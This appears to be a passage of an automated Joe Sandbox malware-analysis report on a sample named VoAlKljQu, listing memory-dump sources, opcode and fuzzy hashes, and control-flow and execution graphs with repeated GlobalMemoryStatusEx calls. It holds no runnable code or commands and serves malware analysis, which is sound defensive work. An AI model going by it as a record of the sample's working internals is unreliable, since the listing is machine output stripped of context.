                                                                                                  • Opcode Fuzzy Hash: 47ae689d495fc0b90cadd4c455ff157f2849d06278a433fa7f1ec2d94437a599
                                                                                                  • Instruction Fuzzy Hash: AD01F7314083409AE7184A29CD84B67BFA8DF41334F58C52BED0C0A286D6399842E6B2
                                                                                                  Uniqueness

                                                                                                  Uniqueness Score: -1.00%

                                                                                                  Memory Dump Source
                                                                                                  • Source File: 00000009.00000002.1725181392.0000000000F7D000.00000040.00000800.00020000.00000000.sdmp, Offset: 00F7D000, based on PE: false
                                                                                                  Joe Sandbox IDA Plugin
                                                                                                  • Snapshot File: hcaresult_9_2_f7d000_VoAlKljQu.jbxd
                                                                                                  Similarity
                                                                                                  • API ID:
                                                                                                  • String ID:
                                                                                                  • API String ID:
                                                                                                  • Opcode ID: 1adefe4dfa87c8aff42dafcc2c76cdee8cbeda4bad93dc0cac22fc03dd797c5c
                                                                                                  • Instruction ID: 11882fea4e243b8805467138badbce73eb9f303b7802e4b0a2280bfdd0a32727
                                                                                                  • Opcode Fuzzy Hash: 1adefe4dfa87c8aff42dafcc2c76cdee8cbeda4bad93dc0cac22fc03dd797c5c
                                                                                                  • Instruction Fuzzy Hash: D6F0C2714083409AE7148E1AC8C8B66FFA8EF91334F18C45BED0C0A286C2799C41DAB1
                                                                                                  Uniqueness

                                                                                                  Uniqueness Score: -1.00%

                                                                                                  Memory Dump Source
                                                                                                  • Source File: 00000009.00000002.1731700356.0000000007190000.00000040.00000800.00020000.00000000.sdmp, Offset: 07190000, based on PE: false
                                                                                                  Joe Sandbox IDA Plugin
                                                                                                  • Snapshot File: hcaresult_9_2_7190000_VoAlKljQu.jbxd
                                                                                                  Similarity
                                                                                                  • API ID:
                                                                                                  • String ID:
                                                                                                  • API String ID:
                                                                                                  • Opcode ID: ef8f115fcab05d7afe3b1f37212a55a666f62ef2be8e706f56e4566a874ec102
                                                                                                  • Instruction ID: be42e894897ebb262ec75efa22ba5c807aed65cd640d077ebd15ab2e31a4c594
                                                                                                  • Opcode Fuzzy Hash: ef8f115fcab05d7afe3b1f37212a55a666f62ef2be8e706f56e4566a874ec102
                                                                                                  • Instruction Fuzzy Hash: 33F030F4E18209EFCF44DFB9E4415ACBBB8AB4A301F0090B59448A3240DB301741CB00
                                                                                                  Uniqueness

                                                                                                  Uniqueness Score: -1.00%

                                                                                                  Memory Dump Source
                                                                                                  • Source File: 00000009.00000002.1731700356.0000000007190000.00000040.00000800.00020000.00000000.sdmp, Offset: 07190000, based on PE: false
                                                                                                  Joe Sandbox IDA Plugin
                                                                                                  • Snapshot File: hcaresult_9_2_7190000_VoAlKljQu.jbxd
                                                                                                  Similarity
                                                                                                  • API ID:
                                                                                                  • String ID:
                                                                                                  • API String ID:
                                                                                                  • Opcode ID: 69899617c19fabc2e3a6a1b52a2ca71320d9ee27b6e444fb3cb3ab14044c5257
                                                                                                  • Instruction ID: 7d014f2cb48e226f2d9d8df5f35670b346d375c5cfc56119def5d0f7c9251e2a
                                                                                                  • Opcode Fuzzy Hash: 69899617c19fabc2e3a6a1b52a2ca71320d9ee27b6e444fb3cb3ab14044c5257
                                                                                                  • Instruction Fuzzy Hash: CAE0E5B4E04208EFCB84DFA8D4416ACBBF8EB48300F10C5A99819E3341DB319A42DF41
                                                                                                  Uniqueness

                                                                                                  Uniqueness Score: -1.00%

                                                                                                  Memory Dump Source
                                                                                                  • Source File: 00000009.00000002.1731700356.0000000007190000.00000040.00000800.00020000.00000000.sdmp, Offset: 07190000, based on PE: false
                                                                                                  Joe Sandbox IDA Plugin
                                                                                                  • Snapshot File: hcaresult_9_2_7190000_VoAlKljQu.jbxd
                                                                                                  Similarity
                                                                                                  • API ID:
                                                                                                  • String ID:
                                                                                                  • API String ID:
                                                                                                  • Opcode ID: abb6a42bba1357e7a493bf4edd179ef0f5b9abc64c73f985c819a2b28e52ed4e
                                                                                                  • Instruction ID: 51a670fc2f6fd9f3354530b9dc42e11082028c1417592ba8eb7e92c5d2b52920
                                                                                                  • Opcode Fuzzy Hash: abb6a42bba1357e7a493bf4edd179ef0f5b9abc64c73f985c819a2b28e52ed4e
                                                                                                  • Instruction Fuzzy Hash: A2E0C2B4E04208AFCB84DFE8E4416ACBBF4EB49214F10C0A99818A3340DA319A42DB40
                                                                                                  Uniqueness

                                                                                                  Uniqueness Score: -1.00%

                                                                                                  Memory Dump Source
                                                                                                  • Source File: 00000009.00000002.1731700356.0000000007190000.00000040.00000800.00020000.00000000.sdmp, Offset: 07190000, based on PE: false
                                                                                                  Joe Sandbox IDA Plugin
                                                                                                  • Snapshot File: hcaresult_9_2_7190000_VoAlKljQu.jbxd
                                                                                                  Similarity
                                                                                                  • API ID:
                                                                                                  • String ID:
                                                                                                  • API String ID:
                                                                                                  • Opcode ID: 77e26d768ae6706c02e8d2e08ec55c280b2cfc1dd3e0d57f61c2ec62befbb4c0
                                                                                                  • Instruction ID: dd9e6ec19bebdb5bf9e850eeb539d5386c148722f8eefd5b1fcdae0736399aa3
                                                                                                  • Opcode Fuzzy Hash: 77e26d768ae6706c02e8d2e08ec55c280b2cfc1dd3e0d57f61c2ec62befbb4c0
                                                                                                  • Instruction Fuzzy Hash: A0E08CB181520CDFCB11DBA9E5055AD7BF9AB4A200F0084A9A00683150EF718A45E751
                                                                                                  Uniqueness

                                                                                                  Uniqueness Score: -1.00%

                                                                                                  Memory Dump Source
                                                                                                  • Source File: 00000009.00000002.1731700356.0000000007190000.00000040.00000800.00020000.00000000.sdmp, Offset: 07190000, based on PE: false
                                                                                                  Joe Sandbox IDA Plugin
                                                                                                  • Snapshot File: hcaresult_9_2_7190000_VoAlKljQu.jbxd
                                                                                                  Similarity
                                                                                                  • API ID:
                                                                                                  • String ID:
                                                                                                  • API String ID:
                                                                                                  • Opcode ID: 816459930762a0925ebb74991a044ff17845a5846641c29d37f1f4c749bb8c85
                                                                                                  • Instruction ID: e55df31e2da042f65f6dbf662b95fc6029dfedcdcc3ef7a1393e2304cf6a8292
                                                                                                  • Opcode Fuzzy Hash: 816459930762a0925ebb74991a044ff17845a5846641c29d37f1f4c749bb8c85
                                                                                                  • Instruction Fuzzy Hash: 9FE01D74E1520CDFCB94EFB8E54969C7FF4EB45211F1441B5984893340DB705A41D751
                                                                                                  Uniqueness

                                                                                                  Uniqueness Score: -1.00%

                                                                                                  Execution Graph

                                                                                                  Execution Coverage:10.2%
                                                                                                  Dynamic/Decrypted Code Coverage:100%
                                                                                                  Signature Coverage:0%
                                                                                                  Total number of Nodes:44
                                                                                                  Total number of Limit Nodes:6
                                                                                                  execution_graph 23445 1030848 23447 103084e 23445->23447 23446 103091b 23447->23446 23449 1031380 23447->23449 23452 1031396 23449->23452 23450 1031480 23450->23447 23452->23450 23453 1037eb0 23452->23453 23454 1037eba 23453->23454 23455 1037ed4 23454->23455 23458 66bfa32 23454->23458 23463 66bfa40 23454->23463 23455->23452 23460 66bfa55 23458->23460 23459 66bfc6a 23459->23455 23460->23459 23461 66bfc81 GlobalMemoryStatusEx GlobalMemoryStatusEx 23460->23461 23462 66bfee0 GlobalMemoryStatusEx GlobalMemoryStatusEx 23460->23462 23461->23460 23462->23460 23464 66bfa55 23463->23464 23465 66bfc6a 23464->23465 23466 66bfc81 GlobalMemoryStatusEx GlobalMemoryStatusEx 23464->23466 23467 66bfee0 GlobalMemoryStatusEx GlobalMemoryStatusEx 23464->23467 23465->23455 23466->23464 23467->23464 23468 103fef8 23469 103ff20 23468->23469 23470 103ff90 23469->23470 23472 66bfee0 23469->23472 23474 66bfcb1 23472->23474 23475 66bfeea 23472->23475 23473 66bfde2 23473->23470 23474->23473 23479 103eb00 23474->23479 23483 103eb10 23474->23483 23475->23470 23476 66bfd60 23476->23470 23480 103eb10 23479->23480 23486 103eb39 23480->23486 23481 103eb1e 23481->23476 23485 103eb39 2 API calls 23483->23485 23484 103eb1e 23484->23476 23485->23484 23487 103eb55 23486->23487 23488 103eb7d 23486->23488 23487->23481 23494 103eb39 GlobalMemoryStatusEx 23488->23494 23495 103ec20 23488->23495 23489 103eb9e 23489->23481 23490 103eb9a 23490->23489 23491 103ec66 GlobalMemoryStatusEx 23490->23491 23492 103ec96 23491->23492 23492->23481 23494->23490 23496 103ec66 GlobalMemoryStatusEx 23495->23496 23497 103ec96 23496->23497 23497->23490

                                                                                                  Control-flow Graph

                                                                                                  • Executed
                                                                                                  • Not Executed
                                                                                                  control_flow_graph 128 66b3058-66b3079 129 66b307b-66b307e 128->129 130 66b3833-66b3836 129->130 131 66b3084-66b30a3 129->131 132 66b3838-66b3857 130->132 133 66b385c-66b385e 130->133 141 66b30bc-66b30c6 131->141 142 66b30a5-66b30a8 131->142 132->133 135 66b3860 133->135 136 66b3865-66b3868 133->136 135->136 136->129 137 66b386e-66b3877 136->137 146 66b30cc-66b30db 141->146 142->141 143 66b30aa-66b30ba 142->143 143->146 256 66b30dd call 66b3888 146->256 257 66b30dd call 66b3886 146->257 147 66b30e2-66b30e4 148 66b30f1-66b33ce 147->148 149 66b30e6-66b30ec 147->149 170 66b3825-66b3832 148->170 171 66b33d4-66b3483 148->171 149->137 180 66b34ac 171->180 181 66b3485-66b34aa 171->181 182 66b34b5-66b34c5 180->182 181->182 185 66b34cb-66b34ea 182->185 186 66b380c-66b3818 182->186 185->186 189 66b34f0-66b34fa 185->189 186->171 187 66b381e 186->187 187->170 189->186 190 66b3500-66b350b 189->190 190->186 191 66b3511-66b35e7 190->191 203 66b35e9-66b35eb 191->203 204 66b35f5-66b3625 191->204 203->204 208 66b3633-66b363f 204->208 209 66b3627-66b3629 204->209 210 66b3641-66b3645 208->210 211 66b36a5-66b36c0 208->211 209->208 210->211 212 66b3647-66b3671 210->212 215 66b37fd-66b3806 211->215 216 66b36c6-66b3702 211->216 221 66b367f-66b369e 212->221 222 66b3673-66b3675 212->222 215->186 215->191 227 66b3710-66b371e 216->227 228 66b3704-66b3706 216->228 221->216 226 66b36a0 221->226 222->221 226->215 230 66b3720-66b372b 227->230 231 66b3735-66b3740 227->231 228->227 230->231 236 66b372d 230->236 234 66b3758-66b3769 231->234 235 66b3742-66b3748 231->235 240 66b376b-66b3771 234->240 241 66b3781-66b378d 234->241 237 66b374a 235->237 238 66b374c-66b374e 235->238 236->231 237->234 238->234 242 66b3773 240->242 243 66b3775-66b3777 240->243 245 66b378f-66b3795 241->245 246 66b37a5-66b37f6 241->246 242->241 243->241 247 66b3799-66b379b 245->247 248 66b3797 245->248 246->215 247->246 248->246 256->147 257->147
                                                                                                  Strings
                                                                                                  Memory Dump Source
                                                                                                  • Source File: 0000000D.00000002.4104588284.00000000066B0000.00000040.00000800.00020000.00000000.sdmp, Offset: 066B0000, based on PE: false
                                                                                                  Joe Sandbox IDA Plugin
                                                                                                  • Snapshot File: hcaresult_13_2_66b0000_VoAlKljQu.jbxd
                                                                                                  Similarity
                                                                                                  • API ID:
                                                                                                  • String ID: $^q$$^q$$^q$$^q$$^q$$^q
                                                                                                  • API String ID: 0-2392861976
                                                                                                  • Opcode ID: c74f6539b8465ce4b8bddc267706a67debce5f170f3b21b43bf59fe87c9eb96c
                                                                                                  • Instruction ID: 8d0a979a619a8f21af378cfab83a8dc5994f114f35a521fb5e5891a779b93c42
                                                                                                  • Opcode Fuzzy Hash: c74f6539b8465ce4b8bddc267706a67debce5f170f3b21b43bf59fe87c9eb96c
                                                                                                  • Instruction Fuzzy Hash: B3322C31E1061ACFCB54EF65C85469DB7B6BF99300F1496A9D409AB324EF30ADC6CB81
                                                                                                  Uniqueness

                                                                                                  Uniqueness Score: -1.00%

                                                                                                  Control-flow Graph

                                                                                                  • Executed
                                                                                                  • Not Executed
                                                                                                  control_flow_graph 632 66b7d90-66b7dae 633 66b7db0-66b7db3 632->633 634 66b7db5-66b7dcf 633->634 635 66b7dd4-66b7dd7 633->635 634->635 636 66b7dfa-66b7dfd 635->636 637 66b7dd9-66b7df5 635->637 638 66b7dff-66b7e0d 636->638 639 66b7e14-66b7e17 636->639 637->636 648 66b7e0f 638->648 649 66b7e36-66b7e4c 638->649 641 66b7e19-66b7e23 639->641 642 66b7e24-66b7e26 639->642 645 66b7e28 642->645 646 66b7e2d-66b7e30 642->646 645->646 646->633 646->649 648->639 652 66b7e52-66b7e5b 649->652 653 66b8067-66b8071 649->653 654 66b8072-66b80a7 652->654 655 66b7e61-66b7e7e 652->655 658 66b80a9-66b80ac 654->658 662 66b8054-66b8061 655->662 663 66b7e84-66b7eac 655->663 659 66b80cf-66b80d2 658->659 660 66b80ae-66b80ca 658->660 664 66b80d8-66b80e4 659->664 665 66b817f-66b8182 659->665 660->659 662->652 662->653 663->662 686 66b7eb2-66b7ebb 663->686 672 66b80ef-66b80f1 664->672 666 66b8188-66b8197 665->666 667 66b83b7-66b83b9 665->667 680 66b8199-66b81b4 666->680 681 66b81b6-66b81fa 666->681 670 66b83bb 667->670 671 66b83c0-66b83c3 667->671 670->671 671->658 675 66b83c9-66b83d2 671->675 676 66b8109-66b810d 672->676 677 66b80f3-66b80f9 672->677 678 66b811b 676->678 679 66b810f-66b8119 676->679 683 66b80fb 677->683 684 66b80fd-66b80ff 677->684 685 66b8120-66b8122 678->685 679->685 680->681 692 66b838b-66b83a1 681->692 693 66b8200-66b8211 681->693 683->676 684->676 687 66b8139-66b8172 685->687 688 66b8124-66b8127 685->688 686->654 690 66b7ec1-66b7edd 686->690 687->666 713 66b8174-66b817e 687->713 688->675 698 66b7ee3-66b7f0d 690->698 699 66b8042-66b804e 690->699 692->667 703 66b8217-66b8234 693->703 704 66b8376-66b8385 693->704 715 66b8038-66b803d 698->715 716 66b7f13-66b7f3b 698->716 699->662 699->686 703->704 712 66b823a-66b8330 call 66b6598 703->712 704->692 704->693 765 66b833e 712->765 766 66b8332-66b833c 712->766 715->699 716->715 722 66b7f41-66b7f6f 716->722 722->715 728 66b7f75-66b7f7e 722->728 728->715 729 66b7f84-66b7fb6 728->729 737 66b7fb8-66b7fbc 729->737 738 66b7fc1-66b7fdd 729->738 737->715 739 66b7fbe 737->739 738->699 740 66b7fdf-66b8036 call 66b6598 738->740 739->738 740->699 767 66b8343-66b8345 765->767 766->767 767->704 768 66b8347-66b834c 767->768 769 66b835a 768->769 770 66b834e-66b8358 768->770 771 66b835f-66b8361 769->771 770->771 771->704 772 66b8363-66b836f 771->772 772->704
                                                                                                  Strings
                                                                                                  Memory Dump Source
                                                                                                  • Source File: 0000000D.00000002.4104588284.00000000066B0000.00000040.00000800.00020000.00000000.sdmp, Offset: 066B0000, based on PE: false
                                                                                                  Joe Sandbox IDA Plugin
                                                                                                  • Snapshot File: hcaresult_13_2_66b0000_VoAlKljQu.jbxd
                                                                                                  Similarity
                                                                                                  • API ID:
                                                                                                  • String ID: $^q$$^q
                                                                                                  • API String ID: 0-355816377
                                                                                                  • Opcode ID: 97201da4e33c82c86fe3683c95a4a5b7ca55177365b82eb2e1216c092d9abc57
                                                                                                  • Instruction ID: 01538347b0478914122ea45ce8a3eda3fb4f23813f7ac5ce6dc8167d13c7ea20
                                                                                                  • Opcode Fuzzy Hash: 97201da4e33c82c86fe3683c95a4a5b7ca55177365b82eb2e1216c092d9abc57
                                                                                                  • Instruction Fuzzy Hash: 11028A30B00206DFDB68DF64D990AAEB7A6FF84344F148569D409DB395DB31EC86CB91
                                                                                                  Uniqueness

                                                                                                  Uniqueness Score: -1.00%

                                                                                                  Memory Dump Source
                                                                                                  • Source File: 0000000D.00000002.4104588284.00000000066B0000.00000040.00000800.00020000.00000000.sdmp, Offset: 066B0000, based on PE: false
                                                                                                  Joe Sandbox IDA Plugin
                                                                                                  • Snapshot File: hcaresult_13_2_66b0000_VoAlKljQu.jbxd
                                                                                                  Similarity
                                                                                                  • API ID:
                                                                                                  • String ID:
                                                                                                  • API String ID:
                                                                                                  • Opcode ID: adfb95ce97ea653afee723f2cd8ea8d0feed6e8a3785f8e590f2cc9bb1839553
                                                                                                  • Instruction ID: 4f4dc762ecabf1e439e9e2b6d0ff6a4eef50f51829689360f1b1bc695f95b763
                                                                                                  • Opcode Fuzzy Hash: adfb95ce97ea653afee723f2cd8ea8d0feed6e8a3785f8e590f2cc9bb1839553
                                                                                                  • Instruction Fuzzy Hash: 5F925534A00204CFDB64DB68C594AADBBF6FB88314F5494A9D449EB365DB34ED86CF80
                                                                                                  Uniqueness

                                                                                                  Uniqueness Score: -1.00%

                                                                                                  Memory Dump Source
                                                                                                  • Source File: 0000000D.00000002.4104588284.00000000066B0000.00000040.00000800.00020000.00000000.sdmp, Offset: 066B0000, based on PE: false
                                                                                                  Joe Sandbox IDA Plugin
                                                                                                  • Snapshot File: hcaresult_13_2_66b0000_VoAlKljQu.jbxd
                                                                                                  Similarity
                                                                                                  • API ID:
                                                                                                  • String ID:
                                                                                                  • API String ID:
                                                                                                  • Opcode ID: 3e3b6d61f3fb7b439ba4b65c770012984efb880a0debeacb85b7406dc0f8ea95
                                                                                                  • Instruction ID: 9caa8673afd6a3921c62e162818fae7f3d65e7280a01d19e6e8956f4289151be
                                                                                                  • Opcode Fuzzy Hash: 3e3b6d61f3fb7b439ba4b65c770012984efb880a0debeacb85b7406dc0f8ea95
                                                                                                  • Instruction Fuzzy Hash: BF22BE35F00219DFDB64DF65C4806EEBBB2EB85310F24846AD44AAB395DB35DC82CB91
                                                                                                  Uniqueness

                                                                                                  Uniqueness Score: -1.00%

                                                                                                  Memory Dump Source
                                                                                                  • Source File: 0000000D.00000002.4104588284.00000000066B0000.00000040.00000800.00020000.00000000.sdmp, Offset: 066B0000, based on PE: false
                                                                                                  Joe Sandbox IDA Plugin
                                                                                                  • Snapshot File: hcaresult_13_2_66b0000_VoAlKljQu.jbxd
                                                                                                  Similarity
                                                                                                  • API ID:
                                                                                                  • String ID:
                                                                                                  • API String ID:
                                                                                                  • Opcode ID: 4779f7df980896fdbf0704d9e554a1ac10a5386af14cc86e44c24a061a5c89ee
                                                                                                  • Instruction ID: 3cfbe340716c4a0ddbd31212ef1f0296b159009540bd56fc6ee2930559053e6e
                                                                                                  • Opcode Fuzzy Hash: 4779f7df980896fdbf0704d9e554a1ac10a5386af14cc86e44c24a061a5c89ee
                                                                                                  • Instruction Fuzzy Hash: C5226E30E10209CFDF64DA69D4907EEB7B6EB89310F249926E409DB395DE35DCC18B92
                                                                                                  Uniqueness

                                                                                                  Uniqueness Score: -1.00%

                                                                                                  Control-flow Graph

                                                                                                  • Executed
                                                                                                  • Not Executed
                                                                                                  control_flow_graph 0 66bace0-66bacfe 1 66bad00-66bad03 0->1 2 66bad1d-66bad20 1->2 3 66bad05-66bad0e 1->3 6 66bad22-66bad26 2->6 7 66bad31-66bad34 2->7 4 66baf17-66baf28 3->4 5 66bad14-66bad18 3->5 15 66baf2a-66baf4e 4->15 16 66bafa5-66bafa7 4->16 5->2 8 66baf0c-66baf16 6->8 9 66bad2c 6->9 10 66bad3e-66bad41 7->10 11 66bad36-66bad3b 7->11 9->7 13 66bad43-66bad50 10->13 14 66bad55-66bad58 10->14 11->10 13->14 17 66bad7b-66bad7e 14->17 18 66bad5a-66bad76 14->18 21 66baf50-66baf53 15->21 22 66bafa8-66bafab 16->22 19 66bad98-66bad9b 17->19 20 66bad80-66bad93 17->20 18->17 25 66baefd-66baf06 19->25 26 66bada1-66bada4 19->26 20->19 27 66baf60-66baf63 21->27 28 66baf55-66baf5f 21->28 29 66bafad-66bafaf 22->29 30 66bb214-66bb216 22->30 25->3 25->8 34 66bada6-66badaf 26->34 35 66badb4-66badb6 26->35 37 66baf72-66baf75 27->37 38 66baf65 call 66bb238 27->38 36 66bafb1-66bafec 29->36 31 66bb218 30->31 32 66bb21d-66bb220 30->32 31->32 32->21 42 66bb226-66bb230 32->42 34->35 43 66badb8 35->43 44 66badbd-66badc0 35->44 50 66bb1df-66bb1f2 36->50 51 66baff2-66baffe 36->51 39 66baf82-66baf85 37->39 40 66baf77-66baf7b 37->40 49 66baf6b-66baf6d 38->49 39->22 46 66baf87-66bafa3 39->46 40->36 45 66baf7d 40->45 43->44 44->1 47 66badc6-66badea 44->47 45->39 46->16 61 66baefa 47->61 62 66badf0-66badff 47->62 49->37 54 66bb1f4 50->54 59 66bb01e-66bb062 51->59 60 66bb000-66bb019 51->60 58 66bb1f5 54->58 58->58 77 66bb07e-66bb0bd 59->77 78 66bb064-66bb076 59->78 60->54 61->25 65 66bae01-66bae07 62->65 66 66bae17-66bae52 call 66b6598 62->66 68 66bae0b-66bae0d 65->68 69 66bae09 65->69 86 66bae6a-66bae81 66->86 87 66bae54-66bae5a 66->87 68->66 69->66 83 66bb0c3-66bb19e call 66b6598 77->83 84 66bb1a4-66bb1b9 77->84 78->77 83->84 84->50 97 66bae99-66baeaa 86->97 98 66bae83-66bae89 86->98 89 66bae5e-66bae60 87->89 90 66bae5c 87->90 89->86 90->86 103 66baeac-66baeb2 97->103 104 66baec2-66baef3 97->104 99 66bae8b 98->99 100 66bae8d-66bae8f 98->100 99->97 100->97 106 66baeb6-66baeb8 103->106 107 66baeb4 103->107 104->61 106->104 107->104
                                                                                                  Strings
                                                                                                  Memory Dump Source
                                                                                                  • Source File: 0000000D.00000002.4104588284.00000000066B0000.00000040.00000800.00020000.00000000.sdmp, Offset: 066B0000, based on PE: false
                                                                                                  Joe Sandbox IDA Plugin
                                                                                                  • Snapshot File: hcaresult_13_2_66b0000_VoAlKljQu.jbxd
                                                                                                  Similarity
                                                                                                  • API ID:
                                                                                                  • String ID: $^q$$^q$$^q$$^q$$^q$$^q$$^q$$^q
                                                                                                  • API String ID: 0-3823777903
                                                                                                  • Opcode ID: dec49c5bfafd93d3e75cfe8edde871f22644d5e1c33e5c15d8337213b7a9926d
                                                                                                  • Instruction ID: 3c3a6879b49af769ef046c9398b740565d74b29dd1fd9a3e9f89a18abe7ad387
                                                                                                  • Opcode Fuzzy Hash: dec49c5bfafd93d3e75cfe8edde871f22644d5e1c33e5c15d8337213b7a9926d
                                                                                                  • Instruction Fuzzy Hash: B6E17D30E1020ACFDB65DFA8D5906AEB7B2EF85304F149929D809EB355DB31DC86CB91
                                                                                                  Uniqueness

                                                                                                  Uniqueness Score: -1.00%

                                                                                                  Control-flow Graph

                                                                                                  • Executed
                                                                                                  • Not Executed
                                                                                                  control_flow_graph 258 66b9160-66b9185 259 66b9187-66b918a 258->259 260 66b9a48-66b9a4b 259->260 261 66b9190-66b91a5 259->261 262 66b9a4d-66b9a6c 260->262 263 66b9a71-66b9a73 260->263 268 66b91bd-66b91d3 261->268 269 66b91a7-66b91ad 261->269 262->263 265 66b9a7a-66b9a7d 263->265 266 66b9a75 263->266 265->259 270 66b9a83-66b9a8d 265->270 266->265 275 66b91de-66b91e0 268->275 271 66b91af 269->271 272 66b91b1-66b91b3 269->272 271->268 272->268 276 66b91f8-66b9269 275->276 277 66b91e2-66b91e8 275->277 288 66b926b-66b928e 276->288 289 66b9295-66b92b1 276->289 278 66b91ea 277->278 279 66b91ec-66b91ee 277->279 278->276 279->276 288->289 294 66b92dd-66b92f8 289->294 295 66b92b3-66b92d6 289->295 300 66b92fa-66b931c 294->300 301 66b9323-66b933e 294->301 295->294 300->301 306 66b9363-66b9371 301->306 307 66b9340-66b935c 301->307 308 66b9373-66b937c 306->308 309 66b9381-66b93fb 306->309 307->306 308->270 315 66b9448-66b945d 309->315 316 66b93fd-66b941b 309->316 315->260 320 66b941d-66b942c 316->320 321 66b9437-66b9446 316->321 320->321 321->315 321->316
                                                                                                  Strings
                                                                                                  Memory Dump Source
                                                                                                  • Source File: 0000000D.00000002.4104588284.00000000066B0000.00000040.00000800.00020000.00000000.sdmp, Offset: 066B0000, based on PE: false
                                                                                                  Joe Sandbox IDA Plugin
                                                                                                  • Snapshot File: hcaresult_13_2_66b0000_VoAlKljQu.jbxd
                                                                                                  Similarity
                                                                                                  • API ID:
                                                                                                  • String ID: $^q$$^q$$^q$$^q
                                                                                                  • API String ID: 0-2125118731
                                                                                                  • Opcode ID: 64d5108c12ef4f3830ede7ba5e4ba70e6986822daa15fec1143cf4014d261b69
                                                                                                  • Instruction ID: 2b6be93b982e78a1c4afc98d4dc304f80de0ece8f0fda5af273917a9629f1f67
                                                                                                  • Opcode Fuzzy Hash: 64d5108c12ef4f3830ede7ba5e4ba70e6986822daa15fec1143cf4014d261b69
                                                                                                  • Instruction Fuzzy Hash: 8F916E30F1060A9FDB64DB65D950BAEB3F6EFC9704F108569C509EB344EE709C828B91
                                                                                                  Uniqueness

                                                                                                  Uniqueness Score: -1.00%

                                                                                                  Control-flow Graph

                                                                                                  • Executed
                                                                                                  • Not Executed
                                                                                                  control_flow_graph 324 66bcf48-66bcf63 325 66bcf65-66bcf68 324->325 326 66bcf6a-66bcfac 325->326 327 66bcfb1-66bcfb4 325->327 326->327 328 66bcfd7-66bcfda 327->328 329 66bcfb6-66bcfd2 327->329 330 66bcfdc-66bcfeb 328->330 331 66bd023-66bd026 328->331 329->328 336 66bcffa-66bd006 330->336 337 66bcfed-66bcff2 330->337 333 66bd028-66bd02a 331->333 334 66bd035-66bd038 331->334 338 66bd2ef-66bd2f8 333->338 339 66bd030 333->339 340 66bd03a-66bd07c 334->340 341 66bd081-66bd084 334->341 343 66bd00c-66bd01e 336->343 344 66bd965-66bd99e 336->344 337->336 345 66bd2fa-66bd2ff 338->345 346 66bd307-66bd313 338->346 339->334 340->341 347 66bd0cd-66bd0d0 341->347 348 66bd086-66bd0c8 341->348 343->331 359 66bd9a0-66bd9a3 344->359 345->346 351 66bd319-66bd32d 346->351 352 66bd424-66bd429 346->352 355 66bd119-66bd11c 347->355 356 66bd0d2-66bd114 347->356 348->347 374 66bd333-66bd345 351->374 375 66bd431 351->375 352->375 360 66bd11e-66bd160 355->360 361 66bd165-66bd168 355->361 356->355 366 66bd9b2-66bd9b5 359->366 367 66bd9a5 call 66bdabd 359->367 360->361 368 66bd16a-66bd1ac 361->368 369 66bd1b1-66bd1b4 361->369 376 66bd9d8-66bd9db 366->376 377 66bd9b7-66bd9d3 366->377 383 66bd9ab-66bd9ad 367->383 368->369 371 66bd1be-66bd1c1 369->371 372 66bd1b6-66bd1bb 369->372 380 66bd1de-66bd1e1 371->380 381 66bd1c3-66bd1d9 371->381 372->371 405 66bd369-66bd36b 374->405 406 66bd347-66bd34d 374->406 382 66bd434-66bd440 375->382 385 66bda0e-66bda10 376->385 386 66bd9dd-66bda09 376->386 377->376 391 66bd22a-66bd22d 380->391 392 66bd1e3-66bd225 380->392 381->380 389 66bd24a-66bd259 382->389 390 66bd446-66bd733 382->390 383->366 395 66bda12 385->395 396 66bda17-66bda1a 385->396 386->385 408 66bd25b-66bd260 389->408 409 66bd268-66bd274 389->409 537 66bd95a-66bd964 390->537 538 66bd739-66bd73f 390->538 403 66bd22f-66bd231 391->403 404 66bd23c-66bd23f 391->404 392->391 395->396 396->359 402 66bda1c-66bda2b 396->402 434 66bda2d-66bda90 call 66b6598 402->434 435 66bda92-66bdaa7 402->435 403->375 414 66bd237 403->414 404->382 415 66bd245-66bd248 404->415 420 66bd375-66bd381 405->420 417 66bd34f 406->417 418 66bd351-66bd35d 406->418 408->409 409->344 419 66bd27a-66bd28c 409->419 414->404 415->389 425 66bd291-66bd294 415->425 426 66bd35f-66bd367 417->426 418->426 419->425 446 66bd38f 420->446 447 66bd383-66bd38d 420->447 429 66bd2dd-66bd2df 425->429 430 66bd296-66bd2d8 425->430 426->420 442 66bd2e1 429->442 443 66bd2e6-66bd2e9 429->443 430->429 434->435 454 66bdaa8 435->454 442->443 443->325 443->338 453 66bd394-66bd396 446->453 447->453 453->375 457 66bd39c-66bd3b8 call 66b6598 453->457 454->454 471 66bd3ba-66bd3bf 457->471 472 66bd3c7-66bd3d3 457->472 471->472 472->352 475 66bd3d5-66bd422 472->475 475->375 539 66bd74e-66bd757 538->539 540 66bd741-66bd746 538->540 539->344 541 66bd75d-66bd770 539->541 540->539 543 66bd94a-66bd954 541->543 544 66bd776-66bd77c 541->544 543->537 543->538 545 66bd78b-66bd794 544->545 546 66bd77e-66bd783 544->546 545->344 547 66bd79a-66bd7bb 545->547 546->545 550 66bd7ca-66bd7d3 547->550 551 66bd7bd-66bd7c2 547->551 550->344 552 66bd7d9-66bd7f6 550->552 551->550 552->543 555 66bd7fc-66bd802 552->555 555->344 556 66bd808-66bd821 555->556 558 66bd93d-66bd944 556->558 559 66bd827-66bd84e 556->559 558->543 558->555 559->344 562 66bd854-66bd85e 559->562 562->344 563 66bd864-66bd87b 562->563 565 66bd88a-66bd8a5 563->565 566 66bd87d-66bd888 563->566 565->558 571 66bd8ab-66bd8c4 call 66b6598 565->571 566->565 575 66bd8d3-66bd8dc 571->575 576 66bd8c6-66bd8cb 571->576 575->344 577 66bd8e2-66bd936 575->577 576->575 577->558
                                                                                                  Strings
                                                                                                  Memory Dump Source
                                                                                                  • Source File: 0000000D.00000002.4104588284.00000000066B0000.00000040.00000800.00020000.00000000.sdmp, Offset: 066B0000, based on PE: false
                                                                                                  Joe Sandbox IDA Plugin
                                                                                                  • Snapshot File: hcaresult_13_2_66b0000_VoAlKljQu.jbxd
                                                                                                  Similarity
                                                                                                  • API ID:
                                                                                                  • String ID: $^q$$^q$$^q
                                                                                                  • API String ID: 0-831282457
                                                                                                  • Opcode ID: f30435abca0ef41cceb67b19ca8d9eb20a7be0af043ac342947d6935c9819676
                                                                                                  • Instruction ID: 6f1d47dcac6035263e349c2fcce253b2ef6e3b42d9b4da2386cab59c4e16b20b
                                                                                                  • Opcode Fuzzy Hash: f30435abca0ef41cceb67b19ca8d9eb20a7be0af043ac342947d6935c9819676
                                                                                                  • Instruction Fuzzy Hash: B9625030A10206CFDB65EF68D690A9DB7B2FF84304F108969D0099F769DB71ED86CB81
                                                                                                  Uniqueness

                                                                                                  Uniqueness Score: -1.00%

